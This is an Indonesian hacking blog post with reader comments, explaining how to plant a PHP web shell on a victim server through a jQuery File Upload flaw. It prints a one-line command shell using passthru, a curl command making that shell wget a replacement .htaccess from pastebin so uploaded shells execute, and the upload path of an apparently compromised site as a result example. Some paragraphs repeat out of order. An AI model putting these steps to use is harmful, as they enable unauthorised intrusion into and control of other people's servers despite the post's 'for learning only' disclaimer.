Akses Shell, Bukan Download! - Shell Backdoor dalam computer security system ,merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya).
Salah satu cara mananamkan shell backdoor pada server adalah dengan metode JQuery File Upload, tapi pernahkah kalian melakukan cara ini namun saat meng-akses shell, shell backdoor kalian malah ter-download? Oke, kita bahas solusinya.
- .htaccess
Salah satu penyebab shell malah ter-download adalah htaccess. Apa itu htaccess? .htaccess adalah file untuk merubah beberapa konfigurasi untuk mengarahkan pada web server Apache.
Lalu bagaimana solusinya? Solusinya adalah me-replace htaccess server dengan htaccess kita sendiri.
Bagaimana caranya??
Penutup,
Semua artikel yang dimuat Maxteroit, hanya untuk pembelajaran saja, penggunaan untuk melanggar hukum diluar tanggung jawab Maxteroit. Jika ada kurang jelas atau ada yang ditanyakan, tinggal kan di kolom komentar.
Terima Kasih,
Berandal.
AddType application/octet-stream .php
Lalu bagaimana solusinya? Solusinya adalah me-replace htaccess server dengan htaccess kita sendiri.
Bagaimana caranya??
- 1. Siapkan file .php berisi script berikut,
<?php passthru($_POST['cmd']); __halt_compiler(); ?>
- 2. Upload ke server korban.
- 3. Buka termninal, ketikkan perintah,
curl -d cmd="wget https://pastebin.com/raw/ttPzvDjQ -O .htaccess" urlshellcontoh:
curl -d cmd="wget https://pastebin.com/raw/ttPzvDjQ -O .htaccess" http://maxteroit.com/shell.php
- 4. Upload shell dengan format .berandal > contoh: shell.berandal
Contoh hasil upload:
https://www.hicinko.com/cruisecms/public/uploadcontent/server/php/files//kecil.berandal
Penutup,
Semua artikel yang dimuat Maxteroit, hanya untuk pembelajaran saja, penggunaan untuk melanggar hukum diluar tanggung jawab Maxteroit. Jika ada kurang jelas atau ada yang ditanyakan, tinggal kan di kolom komentar.
Terima Kasih,
Berandal.
Klu forbidden (403) gmn tuh?
ReplyDeletehacon
Deleteforbid pas jalanin command curl itu
ReplyDeleteKalo forbidden brarti emang dari sana nya mas.
Deletecoy klo diwindos gmana
ReplyDeleteInstall curl manual bisa kok di windows.
DeleteKo ngga work gan gmn solusinya?
ReplyDeleteSEO C
DeletePost a Comment
Komentar Spam Akan kami Hapus